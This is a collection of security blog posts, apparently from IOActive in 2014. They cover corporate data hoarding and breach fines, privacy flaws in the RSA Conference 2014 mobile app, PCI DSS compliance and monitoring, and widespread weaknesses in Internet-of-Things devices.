On average I receive a postal letter from a bank or retailer every two months telling me that I’ve become the unfortunate victim of a data theft or that my credit card is being re-issued to prevent against future fraud. When I quiz my friends and colleagues on the topic, it would seem that they too suffer the same fate on a reoccurring schedule. It may not be that surprising to some folks. 2013 saw over 822 million private records exposed according to the folks over at DatalossDB – and that’s just the ones that were disclosed publicly.

It’s clear to me that something is broken and it’s only getting worse. When it comes to the collection of personal data, too many organizations have a finger in the pie and are ill-equipped (or ill-prepared) to protect it. In fact I’d question why they’re collecting it in the first place. All too often these organizations – of which I’m supposedly a customer – are collecting personal data about “my experience” doing business with them and are hoping to figure out how to use it to their profit (effectively turning me into a product). If these corporations were some bloke visiting a psychologist, they’d be diagnosed with a hoarding disorder. For example, consider the criteria the DSM-5 diagnostic manual uses to identify the disorder:

  • Persistent difficulty discarding or parting with possessions, regardless of the value others may attribute to these possessions.
  • This difficulty is due to strong urges to save items and/or distress associated with discarding.
  • The symptoms result in the accumulation of a large number of possessions that fill up and clutter active living areas of the home or workplace to the extent that their intended use is no longer possible.
  • The symptoms cause clinically significant distress or impairment in social, occupational, or other important areas of functioning.
  • The hoarding symptoms are not due to a general medical condition.
  • The hoarding symptoms are not restricted to the symptoms of another mental disorder.

Whether or not the organizations hoarding personal data know how to profit from it, it’s clear that even the biggest of them are increasingly inept at protecting it. The criminals that are pilfering the data certainly know what they’re doing. The gray market for identity laundering has expanded phenomenally since I talked about it at Blackhat in 2010.

We can moan all we like about the state of the situation now, but we’ll be crying in the not too distant future when, statistically, we progress from being victims of data loss to being victims of (unrecoverable) fraud.

The way I see it, there are two core components to dealing with the spiraling problem of data breaches and the disclosure of personal information. We must deal with the “what data are you collecting and why?” questions, and incentivize corporations to take much more care protecting the personal data they’ve been entrusted with.

I feel that the data hoarding problem can be dealt with fairly easily. At the end of the day it’s about transparency and the ability to “opt out”. If I were to choose a role model for making a sizable fraction of this threat go away, I’d look to the basic components of the UK’s Data Protection Act as the cornerstone of a solution – especially here in the US. I believe the key components of personal data collection should encompass the following:

  • Any organization that wants to collect personal data must have a clearly identified “Data Protection Officer” who not only is a member of the executive board, but is personally responsible for any legal consequences of personal data abuse or data breaches.
  • Before data can be collected, the details of the data sought for collection, how that data is to be used, how long it would be retained, and who it is going to be used by, must be submitted for review to a government or legal authority. I.e. some third-party entity capable of saying this is acceptable use – a bit like the ethics boards used for medical research etc.
  • The specifics of what data a corporation collects and what they use that data for must be publicly visible. Something similar to the nutrition labels found on packaged foods would likely be appropriate – so the end consumer can rapidly discern how their private data is being used.
  • Any data being acquired must include a date of when it will be automatically deleted and removed.
  • At any time any person can request a copy of any and all personal data held by a company about themselves.
  • At any time any person can request the immediate deletion and removal of all data held by a company about themselves.

If such governance existed for the collection and use of personal data, then the remaining big item is enforcement. You’d hope that the morality and ethics of corporations would be enough to ensure they protected the data entrusted to them with the vigor necessary to fight off the vast majority of hackers and organized crime, but this is the real world. Apparently the “big stick” approach needs to be reinforced.

A few months ago I delved into how the fines being levied against organizations that had been remiss in doing all they could to protect their customers’ personal data should be bigger and divvied up. Essentially I’d argue that half of the fine should be pumped back into the breached organization and used to increase its security posture.

Looking at the fines being imposed upon the larger organizations (that could have easily invested more in protecting their customers’ data prior to their breaches), the amounts are laughable. No noticeable financial pain occurs, so why should we be surprised if (and when) it happens again? I’ve become a firm believer that the fines businesses incur should be based upon a percentage of valuation. Why should a twenty-billion-dollar business face the same fine for losing 200,000,000 personal records as a ten-million-dollar business does for losing 50,000 personal records? If the fine were something like two percent of valuation, I can tell you that the leadership of both companies would focus more firmly on the task of keeping your data and mine much safer than they do today. 

ADVISORIES | March 18, 2014

Sielco Sistemi Winlog Multiple Vulnerabilities

This advisory is a follow-up to the alerts titled “ICS-ALERT-12-166-01 Sielco Sistemi Winlog Buffer Overflow,” published June 14, 2012, and “ICS-ALERT-12-179-01 Sielco Sistemi Winlog Multiple Vulnerabilities,” published June 27, 2012, on the ICS-CERT web page.

INSIGHTS | February 27, 2014

Beware Your RSA Mobile App Download

It’s been half a decade since Apple launched their iPhone campaign titled “There’s an app for that”. In the years following, the mobile app stores (from all the major players) have continued to blossom to the point that not only are there several thousand apps that help light your way (i.e. by keeping the flash running bright), but every company, cause, group, or notable event is expected to publish its own mobile application. 
 
Today there are several hundred good “rapid development” kits that allow any newbie to craft and release their own mobile application, and several thousand small professional software development teams that will create one on your behalf. These bespoke mobile applications aren’t the types of products that their owners expect to make much (if any) money from. Instead, these apps are generally helpful tools that appeal to a particular target audience.
 
Now, while the cynical side of me would like to point out that some people should never be trusted with tools as lofty as HTML and setting up WordPress sites – let alone building a mobile app – many corporate marketing teams I’ve dealt with have not only drunk the “There’s an app for that” Kool-Aid, they appear to bathe in the stuff each night. As such, a turnkey approach to app production is destined to involve many sacrifices and, at the top of the sacrificial pillar, data security and integrity continue to reign supreme.
 
A few weeks ago I noticed that, in the run-up to the RSA USA 2014 conference, a new mobile application was conceived and thrust upon the Apple and Google app stores and electronically marketed to the world at large. Maybe it was a reaction to being spammed with a never-ending tirade of “come see us at RSA” emails, or maybe it was topical off the back of a recent blog on the state of mobile banking application security, or maybe both. Either way, I asked some of the IOActive consulting team who had a little bench time between jobs to have a poke at the freshly minted “RSA Conference 2014” mobile application. 
 
 
 
The Google Play app store describes the RSA Conference 2014 application like this:
With the RSA Conference Mobile App, you can stay connected with all Conference activities, view the event catalog, manage session schedules and engage with colleagues and peers while onsite using our social and professional networking tools. You’ll have access to dynamic agenda updates, venue maps, exhibitor listing and more!
Now, I wasn’t expecting the application to be particularly interesting–it’s not as if it was a transactional banking application etc.–but I would have thought that RSA (or whoever they tasked with commissioning the application) would have at least applied some basic elbow grease so as to not potentially embarrass themselves. Alas, that was not to be the case.
 
The team came back rather quickly with a half-dozen security issues. Technically, the highest-impact vulnerability had to do with the app being vulnerable to man-in-the-middle attacks, where an attacker could inject additional code into the login sequence and phish credentials. If we were dealing with a banking application, then heads would have been rolling in an engineering department, but this particular app has only been downloaded a few thousand times, and I seriously doubt that some evil hacker is going to take the time out of their day to target this one application (out of tens of millions) to try to phish credentials to a conference.
 
It was the second most severe vulnerability that caught my eye, though. The RSA Conference 2014 application downloads a SQLite DB file that is used to populate the visual portions of the app (such as schedules and speaker information) but, for some bizarre reason, it also contains information on every registered user of the application – including their name, surname, title, employer, and nationality.
 
 
 
I have no idea why the app developers chose to do that, but I’m pretty sure that the folks who downloaded and installed the application are unlikely to have thought that their details were being made public and published in this way. Marketers love this kind of information though!
 
Some readers may think I’m targeting RSA, and in a small way I guess I am. Security flaws in mobile applications (particularly these rapidly developed and targeted apps) are endemic, and I think the RSA example helps prove the point that there are often inherent risks in even the most benign applications.
 
I’m betting that RSA didn’t even create the application themselves. The Google Play store indicates that a company called QuickMobile was the developer. With one small click it’s possible to get a list of all the other applications QuickMobile has created, presumably on their clients’ behalf.
 
 
 
As you can see from above, there are lots of popular brands and industry conferences employing their app creation services. I wonder if many of them share the same vulnerabilities as the RSA Conference 2014 application?
 
Here’s a little bit of advice to any corporate marketing team. If you’re going to release your own mobile application, the security and integrity of that application are your responsibility. While you can’t outsource that, you can get another organization to assess the application on your behalf.
 
In the meantime, readers of this blog may want to refrain from downloading the RSA Conference 2014 (and related) mobile applications–unless you’re a hacker or marketing team that wants to acquire a free list of conference attendees names, positions, and employers.
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, braking abruptly, and starting all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state, but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously with rare exceptions and not only during the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigation Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach many weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality. Breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs. 
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | February 17, 2014

INTERNET-of-THREATS

At IOActive Labs, I have the privilege of being part of a great team with some of the world’s best hackers. I also have access to really cool research on different technologies that uncovers security problems affecting widely used hardware and software. This gives me a solid understanding of the state of security for many different software and hardware devices – not opinions based on theories, but knowledge based on real-life experience.
 
Currently, the term Internet-of-Things (IoT) is becoming a buzzword used in the media, announcements from hardware device manufacturers, etc. Basically, it’s used to describe an Internet with everything connected to it. It describes what we are seeing nowadays, including:
  • Laptops, tablets, smartphones, set-top boxes, media-streaming devices, and data-storage devices
  • Watches, glasses, and clothes
  • Home appliances, home switches, home alarm systems, home cameras, and light bulbs
  • Industrial devices and industrial control systems
  • Cars, buses, trains, planes, and ships
  • Medical devices and health systems
  • Traffic sensors, seismic sensors, pollution sensors, and weather sensors
     …and more; you name it, and it is or soon will be connected to the Internet.
 
While the devices and systems connected to the Internet are different, they have something in common–most of them suffer from serious security vulnerabilities. This is not a guess. It is based on IOActive Labs’ security research into many of these types of devices currently being used worldwide. Sadly, we are seeing almost the exact same vulnerabilities on these devices that have plagued software vendors over the last decade. Vulnerabilities that the most important software vendors are trying hard to eradicate. It seems that many hardware companies are following really poor security practices when adding software to their products and connecting them to the Internet. What is worse is that sometimes vendors don’t even respond to security vulnerability reports or just downplay the threat and don’t fix the vulnerabilities. Many vendors don’t even know how to properly deal with the security vulnerabilities being reported.
 
Some of common vulnerabilities IOActive Labs finds include:
  • Sensitive data sent over insecure channels
  • Improper use of encryption
    • No SSL certificate validation
    • Things like encryption keys and signing certificates easily available to anyone
  • Hardcoded credentials/backdoor accounts
  • Lack of authentication and/or authorization
  • Storage of sensitive data in clear text
  • Unauthenticated and/or unauthorized firmware updates
  • Lack of firmware integrity check during updates
  • Use of insecure custom-made protocols
Also, vendors’ ambition to collect data is working against them and is increasing attack surfaces considerably. For example, all collected data is sent to the “vendor cloud” and device commands are sent from the “vendor cloud”, instead of just allowing users to connect directly to and command their devices. Hacking into the “vendor cloud” = thousands of devices compromised = lots of lost money.
 
Why should we worry about all of this? Well, these devices affect our everyday life and will continue to do so more and more. We’ve only seen the tip of the iceberg when it comes to the attacks that people, companies, and governments face and how easily they can be performed. If the situation doesn’t change soon, it is just a matter of time before we witness attacks with tragic consequences.
 
If a headline like “+100K Digital Toilets from XYZ1.3 Inc. Found Sending Spam and Distributing Malware” doesn’t scare you because you think it’s funny and improbable, you could be wrong. We shouldn’t wait for headlines such as “Dozens of People Injured When Home Automation Devices Hacked” before we react.
 
Something must be done! From enforcing secure practices during product development to imposing high fines when products are hacked, action must be taken to prevent the loss of money and possibly even lives.
 
Companies should strongly consider:
    • Training developers on secure development
    • Implementing security development practices to improve software security
    • Training company staff on security best practices
    • Implementing a security patch development and distribution process
    • Performing product design/architecture security reviews
    • Performing source code security audits
    • Performing product penetration tests
    • Performing company network penetration tests
    • Staying up-to-date with new security threats
    • Creating a bug bounty program to reward reported vulnerabilities and clearly defining how vulnerabilities should be reported
    • Implementing a security incident/emergency response team
It is difficult to give advice to end users, given that the best solution is simply not to buy or use many products because they are insecure by design. At this stage, it’s just a matter of being lucky and hoping that you won’t be hacked. Maybe opportunistic vendors could come up with some novel solution such as an IPS/anti* device that will protect all of your devices from attacks. Just pray that the protection device itself is not vulnerable.
 
Sometimes end users are forced to live with insecure devices since there isn’t any way to turn them off or not to use them. These include devices provided by TV cable companies, electricity and gas companies, public services companies, governments, etc. These companies and the government should take responsibility for deploying secure products.
 
This is not BS–in a couple of days we will be releasing some of the extensive research I mentioned and on which this blog post is based.
 
I intend for this post to be a wakeup call for everyone! I’m really concerned about the current situation. In the meantime, I will use the term INTERNET-of-THREATS (not Internet-of-Things). Maybe this new buzzword will make us more conscious of the situation. If it doesn’t, then at least I have tried.